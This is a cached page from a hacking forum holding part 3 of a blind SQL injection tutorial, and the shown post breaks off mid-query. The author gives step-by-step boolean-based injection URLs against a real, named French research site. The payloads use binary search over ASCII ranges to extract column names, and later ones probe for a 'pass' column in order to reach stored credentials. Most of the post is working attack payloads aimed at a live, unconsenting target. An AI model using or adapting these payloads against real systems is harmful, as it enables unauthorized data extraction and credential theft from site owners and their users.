<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3387759" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3387759" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3387759</a>. It is a snapshot of the page as it appeared on 12 Feb 2014 20:53:36 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3387759" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:YMNz7G5mG-sJ:www.hackforums.net/showthread.php%3Ftid%3D3387759&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[Tutorial] boolean based blind SQLi using regexp with binary search - part #3 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[Tutorial] boolean based blind SQLi using regexp with binary search - part #3"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3387759"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 02-12-2014, 01:53 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/logo.png" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[Tutorial] boolean based blind SQLi using regexp with binary search - part #3</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3387759" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/rating.js"></script><div id="success_rating_3387759" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3387759"><li style="width: 0%" class="current_rating" id="current_rating_3387759">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387759&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387759&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387759&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387759&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3387759&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3387759" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3387759_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3387759" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3387759&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3387759");
// -->
</script><div><strong>[Tutorial] boolean based blind SQLi using regexp with binary search - part #3</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid31777589" id="pid31777589"></a><table class="tborder" style="border-top-width: 0; " id="post_31777589" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-07-2013, 07:39 AM <span id="edited_by_31777589"><span class="smalltext">(This post was last modified: 04-09-2013 12:49 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387759&amp;pid=31777589#pid31777589">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <a href="http://www.hackforums.net/online.php" title="Online"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/buddy_online.gif" alt="Online" border="0"></a><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 131<br>Posts: 2,129<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">192</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31777589">This tutorial has five parts. This is part <span style="font-size: medium;"><span style="color: #32CD32;"><span style="font-weight: bold;">#3</span></span></span><br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3385306" target="_blank">part #1</a>
 we learned about binary search and regexp. We also learned how to test 
for vulnerability, test for version(), count number of databases and 
number of tables in database() and what is result <span style="color: #32CD32;">true </span>and what <span style="color: #FF4500;">false </span>using boolean based blind SQLi.<br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3387210" target="_blank">part #2</a>
 we learned how to get table names using boolean based blind SQLi. Let's
 continue our tutorial with searching for characters in column names. 
For easier understanding of this part #3 you should already be familiar 
with information from part #1 and part #2 <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"><br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Searching for first column name in known table</span></span><br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3387210" target="_blank">part #2</a> we fond table name <span style="font-weight: bold;"><span style="color: #32CD32;">traduction</span></span>. Now we will try to find out its column names.<br><br><span style="color: #00BFFF;">Short recapitulation from <a href="http://www.hackforums.net/showthread.php?tid=3387210" target="_blank">part #2</a>:</span><br>We
 know ascii values for table/column names can be in range 36-122. 
Allowed characters are: digits 0-9, basic Latin letters a-z A-Z, dollar,
 underscore (<a href="http://dev.mysql.com/doc/refman/5.0/en/identifiers.html%29." target="_blank">http://dev.mysql.com/doc/refman/5.0/en/i...ers.html).</a>
 Those characters have ascii values in range 36-122. If we look in ascii
 table (we will need it in this tutorial many times so bookmark <a href="http://www.asciitable.com/" target="_blank">http://www.asciitable.com</a>) we see <span style="color: #00BFFF;">$</span> has lowest ascii value <span style="color: #32CD32;">36</span> and <span style="color: #00BFFF;">z </span>has highest ascii value <span style="color: #32CD32;">122</span>. 36 and 122 will be our min and max value for first attempt in our binary search.<br><br>So using our formula <span style="color: #FFD700;">mid=(max+min)/2</span> we can calculate our first mid value: (122+36)/2 = 79.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span> - ascii range to search: 36 - 122; mid=79</span><br>Let
 us try if first character in column name has ascii value in upper half 
of possible initial range 36-122. Our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^[',CHAR(79),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>We received result <span style="color: #32CD32;">true</span>
 so let's change our min value to 79 as we know first letter is in range
 79-122. After we recalculate our formula mid=(max+min)/2 --&gt; 
(122+79)/2=101 (100.5 rounded up to 101) we get new mid value 101 for 
our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 2</span> - ascii range to search: 79 - 122; mid=101</span><br>Let's test if our character is in upper half of our latest range 79-122 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^[',CHAR(101),'-',CHAR(122),']') limit 0,1)--
 -</code></div></div>We get result <span style="color: #32CD32;">true </span>-
 site loads fine. Let's change our min value again. This time it will be
 101 because in previous step we get result true testing ascii value of 
first character in range 101-122. After we recalculate our formula 
mid=(max+min)/2 --&gt; (122+101)/2=112 (111.5 rounded to 112) we get new
 mid value 112 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 3</span> - ascii range to search: 101 - 122; mid=112</span><br>Let's test if our character is in upper half of our latest range 101-122 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^[',CHAR(112),'-',CHAR(122),']') limit 0,1)--
 -</code></div></div>We get result <span style="color: #FF4500;">false</span>.
 First character's ascii value is not in upper part of our range 101 - 
122, so we must search for it in lower part of our last range. Our max 
value must be modified to 112. After we recalculate our formula 
mid=(max+min)/2 --&gt; (112+101)/2=107 (106.5 rounded up to 107) we get 
new mid value 107 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 4</span> - ascii range to search: 101 - 112; mid=107</span><br>Let's test if our character is in upper half of our latest range 101-112 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^[',CHAR(107),'-',CHAR(112),']') limit 0,1)--
 -</code></div></div>We get result <span style="color: #FF4500;">false</span>.
 First character's ascii value is not in upper part of our range 101 - 
112, so we must search for it in lower part of our last range. Our max 
value must be modified to 107. After we recalculate our formula 
mid=(max+min)/2 --&gt; (107+101)/2=104 we get new mid value 104 for our 
latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 5</span> - ascii range to search: 101 - 107; mid=104</span><br>Let's test if our character is in upper half of our latest range 101-107 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^[',CHAR(104),'-',CHAR(107),']') limit 0,1)--
 -</code></div></div>Site loads OK again so result for our test is <span style="color: #32CD32;">true</span>.
 Let's change our min value again. This time it will be 104. After we 
recalculate our formula mid=(max+min)/2 --&gt; (107+104)/2=106 (105.5 
rounded up to 106) we get new mid value 106 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span> - ascii range to search: 104 - 107; mid=106</span><br>Let's test if our character is in upper half of our latest range 104-107 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^[',CHAR(106),'-',CHAR(107),']') limit 0,1)--
 -</code></div></div>We get result <span style="color: #FF4500;">false</span>.
 First character's ascii value is not in upper part of our range 104 - 
107, so we must search for it in lower part of our last range. Our max 
value must be modified to 106. After we recalculate our formula 
mid=(max+min)/2 --&gt; (106+104)/2=105 we get new mid value 105 for our 
latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 7</span> - ascii range to search: 104 - 106; mid=105</span><br>Let's test if our character is in upper half of our latest range 104-106 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^[',CHAR(105),'-',CHAR(106),']') limit 0,1)--
 -</code></div></div>Site loads OK again so result for our test is <span style="color: #32CD32;">true</span>.
 Let's change our min value again. This time it will be 105. After we 
recalculate our formula mid=(max+min)/2 --&gt; (106+105)/2=106 (105.5 
rounded up to 106) we get new mid value 106 for our latest range.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 8</span> - ascii range to search: 105 - 106; mid=106</span><br>Let's test if our character is in upper half of our latest range 105-106 so our command with new values will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^[',CHAR(106),'-',CHAR(106),']') limit 0,1)--
 -</code></div></div>We get result <span style="color: #FF4500;">false</span>. First character's ascii value is not in upper part of our range 105 - 106, so we know for sure it can be only 105. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> First character of the first table is <span style="font-weight: bold;"><span style="color: #32CD32;">i</span></span> (ascii 105). Lets remember that or better write it on the paper.<br><br><hr><br>Let's search for the <span style="color: #FFA500;">second character</span> of our first column name. Our regexp command will change slightly as we will add our first letter <span style="color: #32CD32;">i</span> so regexp is<br><span style="color: #00BFFF;">regexp '^i[x-y]'</span>. For x and y value we will insert ascii values in specific range as we did with previous characters in column name.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span> - ascii range to search: 36 - 122; mid=79</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^i[',CHAR(79),'-',CHAR(122),']') limit 0,1)--
 -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 2</span> - ascii range to search: 79 - 122; mid=101</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^i[',CHAR(101),'-',CHAR(122),']') limit 
0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 3</span> - ascii range to search: 79 - 101; mid=90</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^i[',CHAR(90),'-',CHAR(101),']') limit 0,1)--
 -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 4</span> - ascii range to search: 90 - 101; mid=96</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^i[',CHAR(96),'-',CHAR(101),']') limit 0,1)--
 -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 5</span> - ascii range to search: 96 - 101; mid=99</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^i[',CHAR(99),'-',CHAR(101),']') limit 0,1)--
 -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span> - ascii range to search: 99 - 101; mid=100</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^i[',CHAR(100),'-',CHAR(101),']') limit 
0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span> - ascii range to search: 100 - 101; mid=101</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp concat('^i[',CHAR(101),'-',CHAR(101),']') limit 
0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br>Our next character has ascii value 100 --&gt; <span style="color: #32CD32;"><span style="font-weight: bold;">d</span></span>. Till now we know two characters of first column name are <span style="font-weight: bold;"><span style="color: #32CD32;">id</span></span>.<br><br>We
 could continue BUT as id is common column name let's test if this if 
already a full column name or there are additional characters we must 
test for in this column name. We will add <span style="color: #FFA500;">$</span> to our regex to test if column name also ends with our characters <span style="color: #32CD32;">id</span>:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp '^id$' limit 0,1)-- -</code></div></div>and we get result <span style="color: #32CD32;">true</span> Our first column name in table <span style="color: #32CD32;">traduction </span>is <span style="color: #32CD32;">id</span>. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><hr><br><span style="font-weight: bold;"><span style="color: #FFD700;">Testing how many columns have same first character in column name</span></span><br><br>There can be more columns starting with same character (like in our case character <span style="color: #32CD32;">i</span>). Let's check this out. After trying different numbers (greater than 1 as we know for sure at least one column name with <span style="color: #32CD32;">i</span> is there) only this command with number 1 returns result <span style="color: #32CD32;">true</span>.<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select count(*) from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp '^i' limit 0,1)-- -</code></div></div>There is for sure only one column where column name starts with letter <span style="color: #32CD32;">i</span>.<br><br>We
 can use also alternative syntax where we need more executions with 
increasing limit part each time like limit 1,1 than limit 2,1 than 3,1 
...):<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and table_name='traduction' and 
column_name regexp '^i' limit 1,1)-- -</code></div></div>This code gives us already result <span style="color: #FF4500;">false</span> so we know for sure there is only one column where column name starts with letter <span style="color: #32CD32;">i</span> (command where we used limit 0,1).<br><br><hr><br><span style="font-weight: bold;"><span style="color: #FFD700;">Tricks for searching for common column names <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/superman.gif" style="vertical-align: middle;" alt="Superman" title="Superman" border="0"></span></span><br><br>Let's try to find out if there is a column with name <span style="color: #FFD700;">password</span>:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp '^password' 
limit 0,1)-- -</code></div></div>We get result <span style="color: #FF4500;">false</span><br><br>Let's try to find out if there is a column with name <span style="color: #FFD700;">pass</span>:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp 
'^pass'&nbsp;&nbsp;limit 0,1)-- -</code></div></div>We get result <span style="color: #32CD32;">true</span> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>How would we find table name for this column name <span style="color: #32CD32;">pass</span>?
 Well we already know how to find out table names (see tutorial #2). 
Let's combine our command to get table names with command for testing 
existence of column name <span style="color: #32CD32;">pass</span>.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 1</span> - ascii range to search: 36 - 122; mid=79</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp '^pass' and 
table_name regexp concat('^[',CHAR(79),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 2</span> - ascii range to search: 79 - 122; mid=101</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp '^pass' and 
